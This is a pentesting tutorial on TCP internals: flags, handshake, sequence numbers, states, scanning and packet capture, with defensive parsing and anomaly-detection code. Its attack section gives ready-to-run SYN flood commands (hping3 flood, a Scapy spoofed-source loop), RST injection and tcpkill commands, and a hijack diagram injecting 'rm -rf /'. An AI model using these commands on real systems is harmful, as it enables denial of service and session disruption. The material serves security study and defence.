TCP/IP Deep Dive for Pentesters
TL;DR: TCP provides reliable, ordered data delivery over IP. Understanding TCP internals (flags, sequence numbers, states) is essential for scanning, session hijacking, firewall evasion, and network attacks.
Quick Reference
TCP Flags
| Flag | Name | Value (hex) | Use |
|---|---|---|---|
| SYN | Synchronize | 0x02 | Initiate connection |
| ACK | Acknowledgment | 0x10 | Confirm receipt |
| FIN | Finish | 0x01 | Close connection |
| RST | Reset | 0x04 | Abort connection |
| PSH | Push | 0x08 | Send immediately |
| URG | Urgent | 0x20 | Urgent data |
| ECE | ECN-Echo | 0x40 | Congestion notification |
| CWR | Congestion Window Reduced | 0x80 | Response to ECE |
Essential Commands
| Command | Purpose | Example |
|---|---|---|
| `tcpdump` | Capture packets | `tcpdump -i eth0 tcp` |
| `wireshark` | GUI packet analysis | `wireshark` |
| `nmap` | Port scanning | `nmap -sS target` |
| `hping3` | Packet crafting | `hping3 -S target -p 80` |
| `netcat` | TCP connections | `nc -v target 80` |
| `ss` | Socket statistics | `ss -tuln` |
Common TCP Ports
| Port | Service | Notes |
|---|---|---|
| 20/21 | FTP | File transfer |
| 22 | SSH | Secure shell |
| 23 | Telnet | Unencrypted |
| 25 | SMTP | Email |
| 80 | HTTP | Web |
| 443 | HTTPS | Encrypted web |
| 445 | SMB | File sharing |
| 3389 | RDP | Remote desktop |
Why TCP Matters for Pentesters
TCP Knowledge Enables
| Capability | How TCP Knowledge Helps |
|---|---|
| Port Scanning | Understand scan types (SYN, Connect, FIN) |
| Session Hijacking | Predict sequence numbers |
| DoS Attacks | SYN floods, RST attacks |
| Firewall Evasion | Fragment packets, unusual flags |
| IDS Evasion | Overlapping fragments, TTL tricks |
| Packet Analysis | Identify anomalies in captures |
Real-World TCP Attacks
| Attack | Technique | Impact |
|---|---|---|
| Mitnick Attack (1994) | TCP sequence prediction | System compromise |
| SYN Flood | Resource exhaustion | DoS |
| BGP Hijacking | TCP session injection | Traffic interception |
| Off-path attacks | Blind TCP injection | Connection reset |
TCP vs UDP
TL;DR: TCP = reliable, ordered, connection-oriented. UDP = fast, no guarantees, connectionless.
Comparison
| Feature | TCP | UDP |
|---|---|---|
| Connection | Connection-oriented | Connectionless |
| Reliability | Guaranteed delivery | Best effort |
| Ordering | Maintains order | No ordering |
| Error checking | Yes (retransmission) | Basic (checksum) |
| Flow control | Yes (window) | No |
| Speed | Slower | Faster |
| Header size | 20-60 bytes | 8 bytes |
| Use cases | HTTP, SSH, FTP | DNS, DHCP, VoIP |
When Each Is Used
```text
TCP (Reliable):
├── Web browsing (HTTP/HTTPS)
├── Email (SMTP, IMAP, POP3)
├── File transfer (FTP, SFTP)
├── Remote access (SSH, RDP)
└── Database connections

UDP (Fast):
├── DNS queries
├── DHCP
├── Video streaming
├── VoIP
├── Gaming
└── NTP
```
TCP Header Structure
TL;DR: The TCP header contains all control information: ports, sequence numbers, flags, window size, and checksums.
```text
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Source Port          |       Destination Port        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        Sequence Number                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                     Acknowledgment Number                     |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Data |       |C|E|U|A|P|R|S|F|                               |
| Offset| Rsrvd |W|C|R|C|S|S|Y|I|            Window             |
|       |       |R|E|G|K|H|T|N|N|                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Checksum            |        Urgent Pointer         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                 Options (if Data Offset > 5)                  |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             Data                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```
| Field | Size | Purpose | Pentester Interest |
|---|---|---|---|
| Source Port | 16 bits | Sender's port | Identify application |
| Dest Port | 16 bits | Receiver's port | Target service |
| Sequence # | 32 bits | Byte position | Session hijacking |
| Ack # | 32 bits | Next expected byte | Session hijacking |
| Data Offset | 4 bits | Header length | Options detection |
| Flags | 8 bits | Control flags | Scan types, attacks |
| Window | 16 bits | Buffer size | Flow control abuse |
| Checksum | 16 bits | Error detection | Bypass with crafted packets |
| Urgent Ptr | 16 bits | Urgent data location | Rarely used |
| Options | Variable | MSS, timestamps, etc. | Fingerprinting |
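To see the header layout and flag values above applied to real bytes, here is a small parser written for this guide (added example, not code from the original post). It unpacks the fixed 20-byte header, reads Data Offset to find where options end, decodes the flag byte with the table's hex values, and walks the TLV options; the two segments it runs on are constructed, not captured.

```python
# Added example (not from the original post): parse a raw TCP header into its
# fields, decode the flag byte with the hex values from the flags table, and
# walk the options area. The segments below are constructed, not captured.
import struct

FLAG_BITS = {  # hex value -> name, as in the TCP Flags table
    0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH",
    0x10: "ACK", 0x20: "URG", 0x40: "ECE", 0x80: "CWR",
}
OPTION_NAMES = {0: "EOL", 1: "NOP", 2: "MSS", 3: "WScale", 4: "SACKperm", 8: "TS"}

def decode_flags(flag_byte):
    """Return the set flag names in header order, e.g. ['PSH', 'ACK']."""
    return [name for bit, name in FLAG_BITS.items() if flag_byte & bit]

def parse_options(raw):
    """Parse TLV options; EOL and NOP are single bytes without a length field."""
    opts, i = [], 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:                       # EOL: the rest is padding
            opts.append(("EOL", None))
            break
        if kind == 1:                       # NOP
            opts.append(("NOP", None))
            i += 1
            continue
        if i + 1 >= len(raw) or raw[i + 1] < 2:
            raise ValueError("truncated or malformed TCP option")
        length = raw[i + 1]
        data = raw[i + 2:i + length]
        if len(data) != length - 2:
            raise ValueError("option length runs past the header")
        name = OPTION_NAMES.get(kind, "opt%d" % kind)
        if name == "MSS":
            data = struct.unpack("!H", data)[0]
        opts.append((name, data))
        i += length
    return opts

def parse_tcp_header(segment):
    """Split a TCP segment (header + payload) into a dict of named fields."""
    if len(segment) < 20:
        raise ValueError("segment shorter than the 20-byte minimum header")
    sport, dport, seq, ack, off_rsvd, flags, window, csum, urg = \
        struct.unpack("!HHIIBBHHH", segment[:20])
    hdr_len = (off_rsvd >> 4) * 4           # Data Offset counts 32-bit words
    if hdr_len < 20 or hdr_len > len(segment):
        raise ValueError("bad Data Offset %d" % (off_rsvd >> 4))
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "header_len": hdr_len, "flags": decode_flags(flags),
        "window": window, "checksum": csum, "urg_ptr": urg,
        "options": parse_options(segment[20:hdr_len]),
        "payload": segment[hdr_len:],
    }

# Constructed SYN 54321 -> 80 with Data Offset 7 (28-byte header) carrying
# MSS=1460, NOP, NOP, SACK-permitted; and a PSH+ACK data segment with no options.
SAMPLE_SYN = struct.pack("!HHIIBBHHH", 54321, 80, 1000, 0, 7 << 4, 0x02,
                         65535, 0, 0) + bytes([2, 4, 0x05, 0xB4, 1, 1, 4, 2])
SAMPLE_DATA = struct.pack("!HHIIBBHHH", 54321, 80, 1001, 301, 5 << 4, 0x18,
                          65535, 0, 0) + b"GET / HTTP/1.0\r\n"

if __name__ == "__main__":
    for s in (SAMPLE_SYN, SAMPLE_DATA):
        print(parse_tcp_header(s))
```

A segment whose Data Offset points past the bytes actually present is rejected rather than silently parsed, which is the check a dissector needs before trusting the options area.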
TCP Flags Explained
TL;DR: TCP flags control the state and behavior of connections. Understanding flags is crucial for scanning and attacks.
Flag Details
| Flag | Meaning | Notes |
|---|---|---|
| SYN | "I want to start a connection" | Sets initial sequence number; only in first packet of handshake |
| ACK | "I acknowledge your data" | Present in all packets after SYN; acknowledgment number is valid |
| FIN | "I'm done sending" | Graceful connection close; still receives data until other side FINs |
| RST | "Something is wrong, abort immediately" | No graceful close; no further communication |
| PSH | "Send this data immediately" | Don't wait for buffer to fill; application wants data now |
| URG | "There's urgent data" | Urgent pointer is valid; rarely used in practice |
Common Flag Combinations
| Flags | Name | Purpose |
|---|---|---|
| SYN | SYN packet | Connection request |
| SYN+ACK | SYN-ACK | Connection accepted |
| ACK | ACK packet | Normal data transfer |
| FIN+ACK | FIN-ACK | Close request |
| RST | Reset | Abort connection |
| RST+ACK | Reset-ACK | Reject connection |
| PSH+ACK | Push-ACK | Immediate data delivery |
| (none) | NULL | Scanning technique |
| FIN+PSH+URG | XMAS | Scanning technique |
Flags in Wireshark Display Filter
```text
# Filter by specific flags
tcp.flags.syn == 1
tcp.flags.ack == 1
tcp.flags.fin == 1
tcp.flags.reset == 1

# SYN packets only (no ACK)
tcp.flags.syn == 1 && tcp.flags.ack == 0

# RST packets
tcp.flags.reset == 1

# XMAS scan packets
tcp.flags.fin == 1 && tcp.flags.push == 1 && tcp.flags.urg == 1
```
The Three-Way Handshake
TL;DR: TCP connections start with SYN → SYN-ACK → ACK. Understanding this is fundamental for scanning and attacks.
Handshake Process
```text
Client                                              Server
  │                                                    │
  │ ─────────────── SYN ─────────────────────────────► │
  │   Seq=100, Ack=0, Flags=SYN                        │
  │   "I want to connect"                              │
  │                                                    │
  │ ◄───────────── SYN-ACK ──────────────────────────  │
  │   Seq=300, Ack=101, Flags=SYN+ACK                  │
  │   "OK, I acknowledge. Here's my seq#"              │
  │                                                    │
  │ ─────────────── ACK ─────────────────────────────► │
  │   Seq=101, Ack=301, Flags=ACK                      │
  │   "Connection established"                         │
  │                                                    │
  │ ═══════════════ DATA TRANSFER ═══════════════════  │
  │                                                    │
```
Sequence Number Evolution
```text
Step 1 - Client SYN:
    Client Seq = 100 (random initial)

Step 2 - Server SYN-ACK:
    Server Seq = 300 (random initial)
    Server Ack = 101 (Client Seq + 1)

Step 3 - Client ACK:
    Client Seq = 101 (unchanged)
    Client Ack = 301 (Server Seq + 1)

Connection Established:
    Client → Server: Seq starts at 101
    Server → Client: Seq starts at 301
```
Why Random Sequence Numbers?
| Reason | Explanation |
|---|---|
| Security | Prevent sequence prediction attacks |
| Uniqueness | Avoid confusion with old connections |
| Hijacking prevention | Attacker can't guess sequence |
Historical vulnerability: Before random ISNs, attackers could predict sequence numbers (Mitnick attack, 1994).
Sequence and Acknowledgment Numbers
TL;DR: Sequence numbers track bytes sent. Acknowledgment numbers confirm bytes received. Both are essential for session hijacking.
How They Work
Example data transfer:
```text
Client sends 100 bytes:
    Seq=1000, Data=100 bytes
    "Here are bytes 1000-1099"

Server acknowledges:
    Ack=1100
    "I received up to byte 1099, send 1100 next"

Client sends 50 more bytes:
    Seq=1100, Data=50 bytes
    "Here are bytes 1100-1149"

Server acknowledges:
    Ack=1150
    "I received up to byte 1149, send 1150 next"
```
Visualized
```text
Byte stream (client → server):

   1000          1100     1150              1200
     │             │        │                 │
     │◄───Sent────►│◄─Sent─►│◄───Pending─────►│
     │   Packet1   │Packet2 │    Not sent     │
     │  Seq=1000   │Seq=1100│                 │
     │  Len=100    │Len=50  │                 │
                   │        │
   Ack=1100 ───────┘        │   (acknowledges Packet1: bytes 1000-1099)
   Ack=1150 ────────────────┘   (acknowledges Packet2: bytes 1100-1149)
```
Pentester Use: Session Hijacking
To inject packets into an existing TCP session:
- Sniff the connection to observe current Seq/Ack
- Craft packet with correct Seq number
- Send before legitimate packet arrives
| Attack | Detect | Defend |
|---|---|---|
| Sequence prediction | Monitor for blind injections | Random ISNs |
| Session hijacking | Detect duplicate Acks | Encrypted sessions (TLS) |
| RST injection | Track connection states | TCP timestamps |
TCP Connection States
TL;DR: TCP connections move through states (LISTEN, ESTABLISHED, etc.). Understanding states helps identify connection issues and attack opportunities.
State Diagram
```text
                        ┌─────────────┐
                        │   CLOSED    │
                        └──────┬──────┘
                               │
             ┌─────────────────┴─────────────────┐
             │ Passive Open                      │ Active Open
             │ (Server)                          │ (Client)
             ▼                                   ▼
      ┌─────────────┐                     ┌─────────────┐
      │   LISTEN    │                     │  SYN_SENT   │
      └──────┬──────┘                     └──────┬──────┘
             │ Receive SYN                       │
             │ Send SYN-ACK                      │ Receive SYN-ACK
             ▼                                   │ Send ACK
      ┌─────────────┐                            │
      │  SYN_RCVD   │                            │
      └──────┬──────┘                            │
             │ Receive ACK                       │
             └─────────────────┬─────────────────┘
                               ▼
                        ┌─────────────┐
                        │ ESTABLISHED │ ◄── Data Transfer
                        └──────┬──────┘
                               │
             ┌─────────────────┴─────────────────┐
             │ Close                             │ Receive FIN
             │ (Active Close)                    │ (Passive Close)
             ▼                                   ▼
      ┌─────────────┐                     ┌─────────────┐
      │ FIN_WAIT_1  │                     │ CLOSE_WAIT  │
      └──────┬──────┘                     └──────┬──────┘
             │ Receive ACK                       │ Close
             ▼                                   │ Send FIN
      ┌─────────────┐                            ▼
      │ FIN_WAIT_2  │                     ┌─────────────┐
      └──────┬──────┘                     │  LAST_ACK   │
             │ Receive FIN                └──────┬──────┘
             │ Send ACK                          │ Receive ACK
             ▼                                   │
      ┌─────────────┐                            │
      │  TIME_WAIT  │                            │
      └──────┬──────┘                            │
             │ 2*MSL timeout                     │
             ▼                                   │
      ┌─────────────┐                            │
      │   CLOSED    │◄───────────────────────────┘
      └─────────────┘
```
Important States
| State | Meaning | Pentester Note |
|---|---|---|
| LISTEN | Server waiting for connections | Open port |
| SYN_SENT | Client sent SYN, awaiting SYN-ACK | Connect scan in progress |
| SYN_RCVD | Server received SYN | Half-open (SYN flood target) |
| ESTABLISHED | Connection active | Data transfer possible |
| FIN_WAIT_1/2 | Closing initiated | Connection ending |
| TIME_WAIT | Waiting for delayed packets | Port temporarily unavailable |
| CLOSE_WAIT | Remote closed, local still open | Possible resource leak |
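The state diagram and the sequence-number walkthroughs (handshake ISNs 100/300, then the 100- and 50-byte sends) can be checked mechanically. The tracker below is an added example written for this guide, not code from the original post: it follows the client side of one connection through SYN_SENT, ESTABLISHED, FIN_WAIT_1/2 and TIME_WAIT, keeps `snd_nxt`/`rcv_nxt` the way a stack does, and records any segment whose seq or ack does not match what the state says it should be. The server-side states and the event format are simplifications assumed for the example.

```python
# Added example (not from the original post): a client-side tracker that moves
# through the states in the diagram and checks the seq/ack arithmetic from the
# handshake and data-transfer walkthroughs. Events are constructed, not captured.

class TcpConnection:
    """Client side of one connection, following the state diagram."""

    def __init__(self):
        self.state = "CLOSED"
        self.snd_nxt = None   # next seq number this side will send
        self.rcv_nxt = None   # next seq number expected from the peer
        self.errors = []      # seq/ack mismatches or unexpected segments

    def send(self, flags, seq, ack=0, length=0):
        flags = set(flags)
        if "SYN" in flags and self.state == "CLOSED":
            self.state, self.snd_nxt = "SYN_SENT", seq + 1   # SYN consumes one seq
        elif "ACK" in flags and self.state == "SYN_SENT":     # third handshake step
            self._check(seq, ack)
            self.state = "ESTABLISHED"
        elif "FIN" in flags and self.state == "ESTABLISHED":  # active close
            self._check(seq, ack)
            self.state, self.snd_nxt = "FIN_WAIT_1", seq + 1  # FIN consumes one seq
        elif self.state == "ESTABLISHED":                     # ordinary data
            self._check(seq, ack)
            self.snd_nxt = seq + length
        else:
            self.errors.append("unexpected send %s in %s" % (sorted(flags), self.state))
        return self.state

    def receive(self, flags, seq, ack=0, length=0):
        flags = set(flags)
        if self.state == "SYN_SENT" and flags >= {"SYN", "ACK"}:
            if ack != self.snd_nxt:
                self.errors.append("SYN-ACK ack %d != expected %d" % (ack, self.snd_nxt))
            self.rcv_nxt = seq + 1                            # peer ISN + 1
        elif self.state == "ESTABLISHED" and "FIN" in flags:  # passive close
            self.rcv_nxt, self.state = seq + 1, "CLOSE_WAIT"
        elif self.state == "ESTABLISHED":
            if seq != self.rcv_nxt:                           # gap or injected segment
                self.errors.append("out-of-order seq %d, expected %d" % (seq, self.rcv_nxt))
            else:
                self.rcv_nxt = seq + length
        elif self.state == "FIN_WAIT_1" and "ACK" in flags and ack == self.snd_nxt:
            self.state = "FIN_WAIT_2"
        elif self.state == "FIN_WAIT_2" and "FIN" in flags:
            self.rcv_nxt, self.state = seq + 1, "TIME_WAIT"
        return self.state

    def _check(self, seq, ack):
        if seq != self.snd_nxt:
            self.errors.append("seq %d != snd_nxt %d" % (seq, self.snd_nxt))
        if ack != self.rcv_nxt:
            self.errors.append("ack %d != rcv_nxt %d" % (ack, self.rcv_nxt))

def walk_handshake_and_data():
    """Replay the guide's numbers: ISN 100/300, 100 then 50 data bytes, then close."""
    c = TcpConnection()
    trace = [c.send({"SYN"}, seq=100)]                             # SYN_SENT
    trace.append(c.receive({"SYN", "ACK"}, seq=300, ack=101))      # still SYN_SENT
    trace.append(c.send({"ACK"}, seq=101, ack=301))                # ESTABLISHED
    trace.append(c.send({"PSH", "ACK"}, seq=101, ack=301, length=100))
    trace.append(c.receive({"ACK"}, seq=301, ack=201))             # acks bytes 101-200
    trace.append(c.send({"PSH", "ACK"}, seq=201, ack=301, length=50))
    trace.append(c.send({"FIN", "ACK"}, seq=251, ack=301))         # FIN_WAIT_1
    trace.append(c.receive({"ACK"}, seq=301, ack=252))             # FIN_WAIT_2
    trace.append(c.receive({"FIN", "ACK"}, seq=301, ack=252))      # TIME_WAIT
    return trace, c.errors
```

Feeding the tracker a segment with a sequence number far from `rcv_nxt` produces an "out-of-order" error rather than a state change, which is the basic check behind the "detect duplicate Acks" and "track connection states" rows in the table above.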
Viewing Connection States
Commands
```bash
# Linux - ss (recommended)
ss -tuln                        # Listening sockets
ss -tuna                        # All connections
ss -tuna state established      # Established only
ss -tuna state time-wait        # TIME_WAIT sockets

# Linux - netstat (legacy)
netstat -tuln                   # Listening
netstat -tuna                   # All

# Windows
netstat -an
netstat -an | findstr ESTABLISHED

# Count connections by state
ss -tuna | awk '{print $1}' | sort | uniq -c

# Watch for changes
watch -n 1 'ss -tuna | grep ESTAB'
```
TCP Attacks
1. SYN Flood (DoS)
Send many SYN packets without completing handshake, exhausting server resources.
```text
Attacker                                          Victim Server
  │                                                    │
  │ ─────────── SYN (src=spoofed1) ──────────────────► │  SYN_RCVD
  │ ─────────── SYN (src=spoofed2) ──────────────────► │  SYN_RCVD
  │ ─────────── SYN (src=spoofed3) ──────────────────► │  SYN_RCVD
  │ ─────────── SYN (src=spoofed4) ──────────────────► │  SYN_RCVD
  │              ... thousands more ...                │
  │                                                    │
  │                                 Server's SYN queue fills
  │                                 Legitimate connections
  │                                 are dropped
```
| Attack | Detect | Defend |
|---|---|---|
| SYN flood | Monitor half-open connections | SYN cookies |
| Spoofed source IPs | Detect high SYN rate | Rate limiting |
| Distributed (DDoS) | Traffic anomaly detection | Anycast, CDN |
Testing Commands (Lab Only)
```bash
# Using hping3
hping3 -S --flood -V -p 80 target.com

# Using Scapy
python3 << 'EOF'
from scapy.all import *
target = "192.168.1.1"
for i in range(1000):
    ip = IP(src=RandIP(), dst=target)
    tcp = TCP(sport=RandShort(), dport=80, flags="S")
    send(ip/tcp, verbose=0)
EOF

# Detection
ss -tuna state syn-recv | wc -l
netstat -an | grep SYN_RECV | wc -l
```
2. TCP Reset Attack
Inject RST packet to terminate legitimate connections.
```text
Client                    Attacker                    Server
  │                         │                         │
  │◄══════════════════ ESTABLISHED ══════════════════►│
  │                     Seq=1000                      │
  │                         │                         │
  │                         │ Sniff: Current Seq ~1000│
  │                         │                         │
  │          RST            │                         │
  │◄────────────────────────│ Seq=1000 (guessed)      │
  │        Flags=RST        │                         │
  │                         │                         │
  │ Connection terminated!  │                         │
```
| Attack | Detect | Defend |
|---|---|---|
| Inject RST | Monitor unexpected RSTs | Encrypted (TLS) |
| BGP reset attacks | Track connection drops | TCP-AO authentication |
| DoS via RST | Anomaly detection | Sequence validation |
Testing Commands (Lab Only)
```bash
# Using hping3
hping3 -R -s 12345 -p 80 -M 1000 target.com

# Using Scapy
python3 << 'EOF'
from scapy.all import *
# Sniff to get current sequence
# Then inject RST
ip = IP(dst="target", src="spoofed_client")
tcp = TCP(sport=client_port, dport=80, flags="R", seq=current_seq)
send(ip/tcp)
EOF

# Using tcpkill (requires sniffing)
tcpkill -i eth0 host target.com and port 80
```
3. Session Hijacking
Predict or sniff sequence numbers to inject data into active session.
```text
Client                    Attacker                    Server
  │                         │                         │
  │◄══════════════════ ESTABLISHED ══════════════════►│
  │                Seq=1000, Ack=5000                 │
  │                         │                         │
  │                         │ Sniff: Seq/Ack values   │
  │                         │                         │
  │                         │         ACK+PSH         │
  │                         │────────────────────────►│
  │                         │ Seq=1000, Ack=5000      │
  │                         │ Data="rm -rf /"         │
  │                         │                         │
  │                         │        Command executed │
```
| Attack | Detect | Defend |
|---|---|---|
| Blind hijacking | Monitor duplicate ACKs | Random ISN, TLS |
| MITM hijacking | Detect ARP spoofing | End-to-end encryption |
| Sequence prediction | Track connection anomalies | Modern OS (random ISN) |
4. TCP Connection Stealing
Desynchronize client-server sequence numbers, then inject traffic.
1. Attacker causes desynchronization
2. Client and server have different Seq/Ack expectations
3. Attacker bridges the gap
4. Attacker can inject/modify traffic
5. Denial of Service via Connection Exhaustion
Open many connections without sending data.
```text
# Slowloris-style attack (keep connections open)
# Send partial HTTP requests, never complete them
# Each connection consumes server resources
```
| Attack | Detect | Defend |
|---|---|---|
| Slowloris | Monitor slow connections | Connection timeouts |
| Socket exhaustion | Track connection count | Connection limits |
| RUDY (slow POST) | Monitor request rates | Request timeouts |
Scanning with TCP
TL;DR: Different scan types use different TCP flags and behaviors to identify open ports.
Scan Types
| Scan | nmap Flag | How It Works | Stealthy? |
|---|---|---|---|
| SYN scan | `-sS` | SYN → SYN-ACK (open) or RST (closed) | Yes |
| Connect scan | `-sT` | Full 3-way handshake | No (logged) |
| FIN scan | `-sF` | FIN → no response (open) or RST (closed) | Yes |
| NULL scan | `-sN` | No flags → no response (open) or RST (closed) | Yes |
| XMAS scan | `-sX` | FIN+PSH+URG → no response (open) or RST (closed) | Yes |
| ACK scan | `-sA` | ACK → RST (unfiltered) or no response (filtered) | Firewall detection |
Scan Responses
```text
SYN Scan:

  Open Port:                          Closed Port:
  ┌────────┐      ┌────────┐          ┌────────┐      ┌────────┐
  │Scanner │      │ Target │          │Scanner │      │ Target │
  └───┬────┘      └───┬────┘          └───┬────┘      └───┬────┘
      │               │                   │               │
      │──── SYN ─────►│                   │──── SYN ─────►│
      │               │                   │               │
      │◄── SYN-ACK ───│                   │◄──── RST ─────│
      │               │                   │               │
      │──── RST ─────►│                   │  Port is closed
      │   (Abort)     │                   │               │

FIN/NULL/XMAS Scan (RFC 793):

  Open Port:                          Closed Port:
  ┌────────┐      ┌────────┐          ┌────────┐      ┌────────┐
  │Scanner │      │ Target │          │Scanner │      │ Target │
  └───┬────┘      └───┬────┘          └───┬────┘      └───┬────┘
      │               │                   │               │
      │── FIN/etc. ──►│                   │── FIN/etc. ──►│
      │               │                   │               │
      │   (silence)   │                   │◄──── RST ─────│
      │               │                   │               │
      │   Open or     │                   │  Port is closed
      │   Filtered    │                   │               │
```
Practical Scanning
Scan Commands
```bash
# === nmap Scans ===
# SYN scan (most common, requires root)
sudo nmap -sS -p 1-1000 target.com
# Connect scan (no root needed)
nmap -sT -p 1-1000 target.com
# FIN scan
sudo nmap -sF target.com
# NULL scan
sudo nmap -sN target.com
# XMAS scan
sudo nmap -sX target.com
# ACK scan (firewall detection)
sudo nmap -sA target.com
# Window scan (variation of ACK)
sudo nmap -sW target.com

# === hping3 Scans ===
# SYN scan
hping3 -S -p 80 target.com
# FIN scan
hping3 -F -p 80 target.com
# XMAS scan
hping3 -FPU -p 80 target.com
# NULL scan (hping3 sends no flags by default)
hping3 -p 80 target.com

# === Scan timing ===
# Slow (IDS evasion)
nmap -sS -T1 target.com
# Fast
nmap -sS -T4 target.com
# Aggressive
nmap -sS -T5 target.com
```
Packet Analysis
TL;DR: Capturing and analyzing TCP packets reveals connection patterns, anomalies, and potential attacks.
Wireshark TCP Analysis
Wireshark TCP Dissection (a SYN, with the flag bits shown the way Wireshark prints them):
```text
Frame 1: TCP SYN
  Source Port: 54321
  Destination Port: 80
  Sequence Number: 1000    (relative sequence number: 0)
  Acknowledgment Number: 0
  Flags: 0x002 (SYN)
    .... ...0 .... = Acknowledgment: Not set
    .... .... 0... = Push: Not set
    .... .... .0.. = Reset: Not set
    .... .... ..1. = Syn: Set
    .... .... ...0 = Fin: Not set
  Window: 65535
  Options: MSS=1460, SACK permitted, Timestamps
```
Useful Wireshark Filters
| Filter | Purpose |
|---|---|
| `tcp` | All TCP traffic |
| `tcp.port == 80` | HTTP traffic |
| `tcp.flags.syn == 1` | SYN packets |
| `tcp.flags.syn == 1 && tcp.flags.ack == 0` | Initial SYNs |
| `tcp.flags.reset == 1` | RST packets |
| `tcp.analysis.retransmission` | Retransmissions |
| `tcp.analysis.duplicate_ack` | Duplicate ACKs |
| `tcp.analysis.zero_window` | Window full |
| `tcp.analysis.out_of_order` | Out of order |
tcpdump for TCP
tcpdump Commands
```bash
# Capture TCP on port 80
tcpdump -i eth0 tcp port 80
# Capture SYN packets only
tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'
# Capture SYN but not SYN-ACK
tcpdump -i eth0 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'
# Capture RST packets
tcpdump -i eth0 'tcp[tcpflags] & tcp-rst != 0'
# Capture FIN packets
tcpdump -i eth0 'tcp[tcpflags] & tcp-fin != 0'
# Show TCP flags
tcpdump -i eth0 tcp -vv
# Save to file
tcpdump -i eth0 tcp -w capture.pcap
# Read from file
tcpdump -r capture.pcap
# Show hex dump
tcpdump -i eth0 tcp -X
# Filter by host
tcpdump -i eth0 tcp and host 192.168.1.1
# Filter by port range
tcpdump -i eth0 tcp portrange 20-25
```
Identifying Anomalies
| Anomaly | Indicator | Possible Cause |
|---|---|---|
| High retransmissions | `tcp.analysis.retransmission` | Network issues, attack |
| Many RST packets | `tcp.flags.reset == 1` | Port scan, RST attack |
| Half-open connections | SYN without SYN-ACK | SYN flood |
| Unusual flags | FIN without prior handshake | FIN/NULL/XMAS scan |
| Large window size | Window > normal | Potential amplification |
| Out of order packets | Sequence gaps | Network issues or injection |
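The indicators in this table, together with the half-open count from the SYN flood section, can be applied to a list of segments offline. The detector below is an added example written for this guide (not code from the original post): it tracks which flows complete the handshake, counts SYNs left pending per service, flags NULL, XMAS and bare-FIN probes against flows that never had a handshake, and counts RSTs flowing back to a single host, which is the signature a closed-port scan leaves. The record format and both thresholds are assumptions, and the sample records are constructed.

```python
# Added example (not from the original post): apply the anomaly-table indicators
# and the SYN-flood half-open count to constructed segment records.
from collections import Counter, defaultdict

HALF_OPEN_LIMIT = 5   # assumed: flag a service with more pending SYNs than this
RST_LIMIT = 4         # assumed: flag a host receiving more RSTs than this

def analyze(records):
    """records: (src, sport, dst, dport, flags), flags like 'SYN' or 'FIN+PSH+URG'."""
    pending = defaultdict(set)   # (dst, dport) -> client flows awaiting the final ACK
    established = set()          # flows that completed the three-way handshake
    rst_to = Counter()           # RSTs received per host (closed-port scan signature)
    findings = []
    for src, sport, dst, dport, flags in records:
        f = set(flags.split("+")) if flags else set()
        flow = (src, sport, dst, dport)
        if f == set():
            findings.append(("NULL scan probe", flow))
        elif f == {"FIN", "PSH", "URG"}:
            findings.append(("XMAS scan probe", flow))
        elif f == {"FIN"} and flow not in established:
            findings.append(("FIN without handshake", flow))
        elif f == {"SYN"}:
            pending[(dst, dport)].add(flow)
        elif f == {"ACK"} and flow in pending.get((dst, dport), ()):
            pending[(dst, dport)].discard(flow)   # handshake completed
            established.add(flow)
        if "RST" in f:
            rst_to[dst] += 1
    for svc, flows in pending.items():
        if len(flows) > HALF_OPEN_LIMIT:
            distinct_sources = len({x[0] for x in flows})
            findings.append(("possible SYN flood", svc, len(flows), distinct_sources))
    for host, n in rst_to.items():
        if n > RST_LIMIT:
            findings.append(("possible port scan (RSTs back to scanner)", host, n))
    return findings

# Constructed records. SRV is the monitored server; addresses are documentation ranges.
SRV = "10.0.0.1"
SAMPLE_RECORDS = [
    # one legitimate connection from 10.0.0.5: handshake, data, graceful close
    ("10.0.0.5", 40000, SRV, 80, "SYN"),
    (SRV, 80, "10.0.0.5", 40000, "SYN+ACK"),
    ("10.0.0.5", 40000, SRV, 80, "ACK"),
    ("10.0.0.5", 40000, SRV, 80, "PSH+ACK"),
    ("10.0.0.5", 40000, SRV, 80, "FIN+ACK"),
]
# six spoofed SYNs to port 80 that are never completed (SYN flood pattern)
SAMPLE_RECORDS += [("192.0.2.%d" % i, 1000 + i, SRV, 80, "SYN") for i in range(1, 7)]
# a scanner probing five closed ports: SYN in, RST+ACK back each time
for p in (21, 22, 23, 25, 110):
    SAMPLE_RECORDS += [("203.0.113.9", 50000 + p, SRV, p, "SYN"),
                       (SRV, p, "203.0.113.9", 50000 + p, "RST+ACK")]
# NULL, XMAS and bare-FIN probes against 443
SAMPLE_RECORDS += [("203.0.113.9", 45000, SRV, 443, ""),
                   ("203.0.113.9", 45001, SRV, 443, "FIN+PSH+URG"),
                   ("203.0.113.9", 45002, SRV, 443, "FIN")]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(finding)
```

The same logic maps onto the table's Wireshark filters: the NULL/XMAS/FIN branches correspond to the flag filters, and the pending set is what `ss -tuna state syn-recv | wc -l` counts on the host itself.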
